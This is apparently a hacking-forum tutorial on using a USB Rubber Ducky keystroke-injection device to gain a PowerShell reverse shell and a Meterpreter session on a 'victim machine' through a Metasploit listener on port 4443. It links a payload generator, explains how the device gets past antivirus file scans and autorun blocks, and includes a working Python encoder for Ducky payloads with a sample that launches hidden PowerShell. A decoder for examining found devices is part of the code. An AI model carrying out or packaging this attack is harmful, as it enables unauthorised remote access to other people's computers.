(Also posted this on Viphackforums and Ubers)
Well,
Yesterday my WiFi Pineapple Mark V and USB Rubber Ducky came in.
I love them. They are really great pentesting tools.
In this tutorial we are going to talk about USB Rubber Ducky scripts. So, what is it?
It's basically a HID (Human Interface Device), i.e. it shows up as a keyboard. Autorun from removable media is normally disabled these days, but a keyboard is not affected by that: the Ducky simply types its payload the way a human would, so there is no script file on the drive for an antivirus to scan. Keep in mind that whatever you type (a PowerShell one-liner, a keylogger, etc.) still runs as a normal process on the host, so endpoint defenses that look at process behaviour can still catch it; what the Ducky avoids is the file scan and the autorun block, not detection of the payload itself.
HAK5 information about the USB Rubber Ducky:
Nearly every computer including desktops, laptops, tablets and smartphones take input from Humans via Keyboards. It's why there's a specification with the ubiquitous USB standard known as HID - or Human Interface Device. Simply put, any USB device claiming to be a Keyboard HID will be automatically detected and accepted by most modern operating systems. Whether it be a Windows, Mac, Linux or Android device the Keyboard is King.
By taking advantage of this inherent trust with scripted keystrokes at speeds beyond 1000 words per minute traditional countermeasures can be bypassed by this tireless trooper - the USB Rubber Ducky.
Source: https://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe

The set of the USB Rubber Ducky looks like this:
Well, basically I downloaded a script that generates a reverse PowerShell payload for the Ducky:
https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky
After that I ran the Ruby setup script of this specific project and started the multi/handler module in Metasploit as a listener on port 4443:
After the Ducky Script was created I encoded it with the official USB Rubber Ducky encoder:
Now I put the encoded file on my USB Rubber Ducky's SD card and put the card back in my USB Rubber Ducky:
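As an added example (not from the original post, and not the official Hak5 encoder or the b00stfr3ak repo), here is a small Python encoder/decoder for Ducky Script. It follows the inject.bin layout as I understand it from the open-source encoders: every keystroke is a two-byte pair of HID keyboard usage ID and modifier bitmask, and DELAY is 0x00 followed by the milliseconds, split into 255 ms chunks. It only supports a US-layout subset (REM, DELAY, STRING, named keys like ENTER and TAB, and modifier combos like GUI r); the sample script at the bottom is constructed for illustration. The decode() half is the part a defender wants: point it at an inject.bin pulled off a Ducky you found lying around and it lists what the device would have typed. Diff the encoder's output against the official encoder's inject.bin for the same script before relying on it.

```python
"""Ducky Script <-> inject.bin (added example, US layout subset). Each instruction is
two bytes: HID keyboard usage ID, then a modifier bitmask; DELAY is usage 0x00 followed
by the wait in ms, split into 255 ms chunks. The firmware replays them as keystrokes."""
import struct

MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08

# Usage IDs (HID usage page 0x07) for the unshifted US layout.
_KEYCODES = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
_KEYCODES.update({c: 0x1E + i for i, c in enumerate("1234567890")})
_KEYCODES.update({" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31,
                  ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38})
# Shifted characters reuse the unshifted key's usage ID plus LEFT_SHIFT.
_SHIFTED = dict(zip('!@#$%^&*()_+{}|:"~<>?', "1234567890-=[]\\;'`,./"))
_SHIFTED.update({c.upper(): c for c in "abcdefghijklmnopqrstuvwxyz"})
_NAMED_KEYS = {"ENTER": 0x28, "ESC": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B, "SPACE": 0x2C,
               "CAPSLOCK": 0x39, "DELETE": 0x4C, "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51,
               "UP": 0x52, **{f"F{n}": 0x39 + n for n in range(1, 13)}}
_MODIFIER_WORDS = {"CTRL": MOD_CTRL, "SHIFT": MOD_SHIFT, "ALT": MOD_ALT, "GUI": MOD_GUI}


def char_to_bytes(ch):
    """One printable ASCII character -> (usage ID, modifier) pair."""
    if ch in _KEYCODES:
        return bytes([_KEYCODES[ch], 0x00])
    if ch in _SHIFTED:
        return bytes([_KEYCODES[_SHIFTED[ch]], MOD_SHIFT])
    raise ValueError(f"no US-layout usage ID for {ch!r}")


def delay_to_bytes(ms):
    """DELAY n -> (0x00, chunk) pairs, each chunk at most 255 ms."""
    chunks = [255] * (ms // 255) + ([ms % 255] if ms % 255 else [])
    return b"".join(bytes([0x00, c]) for c in chunks)


def combo_to_bytes(words):
    """'GUI r', 'CTRL ALT DELETE' or 'ENTER' -> one keystroke with modifier bits set."""
    modifier, key = 0, None
    for w in words:
        if w.upper() in _MODIFIER_WORDS:
            modifier |= _MODIFIER_WORDS[w.upper()]
        elif w.upper() in _NAMED_KEYS:
            key = _NAMED_KEYS[w.upper()]
        elif len(w) == 1 and w.lower() in _KEYCODES:
            key = _KEYCODES[w.lower()]
        else:
            raise ValueError(f"unknown key {w!r}")
    # A bare modifier such as GUI presses the modifier key itself (usage 0xE0-0xE3).
    return bytes([0xE0 + modifier.bit_length() - 1 if key is None else key, modifier])


def encode(script):
    """Encode REM, DELAY, STRING and key-combo lines into inject.bin bytes."""
    out = bytearray()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "DELAY":
            out += delay_to_bytes(int(arg))
        elif cmd.upper() == "STRING":
            out += b"".join(char_to_bytes(ch) for ch in arg)
        else:
            out += combo_to_bytes(line.split())
    return bytes(out)


def decode(blob):
    """Inverse of encode(): list what an inject.bin types, for triage of a found Ducky."""
    by_usage = {v: k for k, v in _KEYCODES.items()}
    by_name = {v: k for k, v in _NAMED_KEYS.items()}
    by_name.update({0xE0 + i: n for i, n in enumerate(_MODIFIER_WORDS)})
    unshift = {v: k for k, v in _SHIFTED.items()}
    lines, typed = [], ""
    for key, mod in struct.iter_unpack("BB", blob):
        ch = by_usage.get(key)
        if ch and mod in (0, MOD_SHIFT) and (mod == 0 or ch in unshift):
            typed += ch if mod == 0 else unshift[ch]
            continue
        if typed:  # flush a run of plain characters as one STRING line
            lines.append("STRING " + typed)
            typed = ""
        if key == 0x00:
            if lines and lines[-1].startswith("DELAY "):  # re-join 255 ms chunks
                mod += int(lines.pop().split()[1])
            lines.append(f"DELAY {mod}")
        else:
            mods = [n for n, bit in _MODIFIER_WORDS.items() if mod & bit and key < 0xE0]
            lines.append(" ".join(mods + [by_name.get(key) or by_usage.get(key, f"0x{key:02X}")]))
    if typed:
        lines.append("STRING " + typed)
    return lines


SAMPLE_SCRIPT = """\
REM constructed sample: open the Run dialog and start a hidden PowerShell window
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
"""

if __name__ == "__main__":  # write encode(SAMPLE_SCRIPT) to inject.bin on the SD card root
    print("\n".join(decode(encode(SAMPLE_SCRIPT))))
```

The firmware loads inject.bin from the root of the SD card. Because the whole payload is nothing but keystrokes, a victim with a non-US keyboard layout will get a scrambled command; that is why the official encoder takes a keyboard-layout option, while this example hard-codes US.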
Next I put the Rubber Ducky in my victim machine. Let's see what happens.
Video:
https://www.youtube.com/watch?v=htoZVMH9vFM&feature=youtu.be
This takes about a minute, but you can minimize the window in the meantime.
Now we have a PowerShell reverse shell from a fully patched machine.
Meterpreter session: